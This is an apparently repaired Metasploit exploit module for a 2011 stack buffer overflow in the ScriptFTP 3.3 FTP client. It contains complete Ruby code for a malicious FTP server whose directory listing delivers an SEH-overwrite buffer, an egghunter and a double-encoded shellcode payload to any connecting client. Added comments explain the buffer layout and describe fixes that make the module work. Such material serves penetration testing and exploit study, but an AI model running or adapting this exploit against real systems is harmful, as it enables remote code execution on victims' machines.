ScriptFTP 3.3 Remote Buffer Overflow (MSF)
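#Exploit Title: ScriptFTP 3.3 Remote Buffer Overflow (MSF)
#Date: Sept 20 2011
#Author: otoy
#Version: 3.3
#Tested on: Windows XP SP3
#CVE : -
#EDB-ID: 17876
#Thanks: cyb3r.anbu, spentera-team, dE-team, offsec, exploit-db, corelanc0d3r

# Client-side exploit: this module is the *malicious FTP server*. The FtpServer
# mixin runs the listener; once a ScriptFTP 3.3 client connects and issues LIST
# (what its GETLIST script command sends), on_client_command_list answers with a
# directory listing whose file name is an oversized SEH-overwrite chain that the
# client expands to Unicode and eventually executes.
#
# Practitioner notes:
#  - Nothing identifies the peer. on_client_unknown_command answers "200 OK" to
#    any command and the LIST handler serves the buffer unconditionally, so every
#    client that reaches SRVHOST:SRVPORT gets the payload, not just the target.
#  - The whole buffer travels as a file name inside a LIST line; the BadChars
#    list excludes / \ < > ^ ~ and the control bytes, presumably for that reason
#    (the author does not say - confirm before widening it).
#  - The target table's Offset is now honoured (the original hard-coded 1746 in
#    the handler and ignored the table), and the listing interpolates the built
#    buffer (the scraped copy showed the interpolations as "#(unknown)" while the
#    buffer was otherwise never used).
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Exploit::Remote::FtpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ScriptFTP 3.3 Remote Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in ScriptFTP 3.3 ftp client.
          The overflow is triggered when the client connects to a FTP server which
          sends an overly long directory and filename in response to a GETLIST
          command. This will cause an access violation, and will eventually
          overwrite the saved extended instruction pointer.
      },
      'Author'         =>
        [
          'modpr0be', # Original bug
          'Cyberheb', # porting from poc to msf
          'Otoy',     # final msf module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => "0",
      'References'     =>
        [
          [ 'OSVDB', '75633' ],
          [ 'URL', 'http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'          => 1000,
          'DisableNops'    => true,
          # Stage 1 encoding: alphanumeric, decoder expects EDX to point at
          # itself (the GetPC stub in build_overflow_filename provides that).
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'BadChars'       => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDX',
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is only two bytes because the client inserts the 0x00s
          # (Unicode expansion): the handler address becomes 0x005B0045.
          # "Universal" is the author's claim; the address is presumably in
          # the ScriptFTP image rather than an OS DLL - not verified here.
          [ 'Windows XP Universal', { 'Ret' => "\x45\x5B", 'Offset' => 1746 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sept 20 2011',
      'DefaultTarget'  => 0))
  end

  # No extra setup beyond what the FtpServer mixin does.
  def setup
    super
  end

  # Accept anything the mixin does not dispatch itself (USER, PASS, CWD, ...)
  # so the client keeps going until it issues LIST. This is also why there is
  # no authentication of any kind on this server.
  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  # Stage 2 encoding: wrap an already alphanumeric buffer with the Unicode
  # encoder. Its decoder wants EAX pointing at the buffer; the align2 stub
  # emitted just before the payload sets EAX up (per the author's annotations).
  #
  # p - raw bytes to encode
  # returns the Unicode-safe encoded buffer
  def get_unicode_payload(p)
    encoder = framework.encoders.create("x86/unicode_upper")
    encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
    encoder.encode(p, nil, nil, platform)
  end

  # Build the oversized file name that overwrites the SEH record.
  #
  # Layout, in order:
  #   junk(Offset) | nSEH | SEH | align | walk | junk1 | egghunter | junk2
  #   | egg | align2 | unicode(GetPC stub + payload) | junk1
  #
  # The raw bytes after the SEH record are written knowing the client will
  # expand them to Unicode (every \x73 is an author-chosen nop/align byte).
  # Instruction annotations are the author's; they are kept, not re-verified.
  #
  # returns the complete buffer as a String
  def build_overflow_filename
    # Offset comes from the target table (falls back to the original 1746 so
    # a target entry without 'Offset' still works).
    offset    = target['Offset'] || 1746
    junk_head = "A" * offset
    nseh      = "\x61\x62"
    seh       = target['Ret']

    #prepare for align
    align  = "\x60"          #pushad
    align << "\x73"          #nop/align
    align << "\x53"          #push ebx
    align << "\x73"          #nop/align
    align << "\x58"          #pop eax
    align << "\x73"          #nop/align
    align << "\x05\x02\x11"  #add eax,0x11000200
    align << "\x73"          #nop/align
    align << "\x2d\x01\x11"  #sub eax,0x11000120
    align << "\x73"          #nop/align

    #align after egg - leaves EAX at the Unicode payload and returns into it
    align2  = "\x73\x57\x73\x58\x73"  #nop/push edi/nop/pop eax/nop
    align2 << "\xb9\x1b\xaa"          #mov ecx,0xaa001b00
    align2 << "\xe8\x73"              #add al,ch + nop
    align2 << "\x50\x73\xc3"          #push eax,nop,ret

    #walking
    walk  = "\x50"  #push eax
    walk << "\x73"  #nop/align
    walk << "\xc3"  #ret

    #egghunter - pre-encoded alphanumeric hunter supplied by the author;
    #it searches memory for the egg marker placed further down the buffer.
    egghunter  = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
    egghunter << "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
    egghunter << "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
    egghunter << "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
    egghunter << "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
    egghunter << "SEYWKOYWA"

    #junk
    junk1 = "\x44" * 106 + "\x73"
    junk2 = "\x42" * 544

    #egg
    egg = "0t0t"

    #payload: GetPC stub (reads as mov ecx,esp / fcmovne / fnstenv [ecx-0xc] /
    #pop edx / add edx,0x41 / sub edx,0x35) that leaves a pointer into the
    #buffer in EDX - the register the AlphanumMixed decoder was told to use -
    #followed by the encoded payload, then wrapped once more for Unicode.
    stubget = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
    palpha  = stubget + payload.encoded
    puni    = get_unicode_payload(palpha)

    filename  = junk_head
    filename << nseh
    filename << seh
    filename << align
    filename << walk
    filename << junk1
    filename << egghunter
    filename << junk2
    filename << egg
    filename << align2
    filename << puni
    filename << junk1
    filename
  end

  # LIST handler - the trigger. Opens the data connection, acknowledges on the
  # control channel, then sends a three-entry listing whose names carry the
  # overflow buffer.
  #
  # c   - the client connection
  # arg - LIST argument (ignored; the response is the same for any path)
  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    unless conn
      c.put("425 Can't build data connection\r\n")
      return
    end

    print_status(" - Data connection set up")
    # The author sends the 226 before the listing itself; kept as-is since the
    # client evidently tolerates that ordering.
    c.put("150 Here comes the directory listing.\r\n")
    c.put("226 Directory send ok.\r\n")

    filename = build_overflow_filename

    print_status(" - Sending directory list via data connection")
    dirlist  = "-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\r\n"
    dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}\r\n"
    dirlist << "-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\r\n"
    conn.put(dirlist)
    conn.close
    return
  end
end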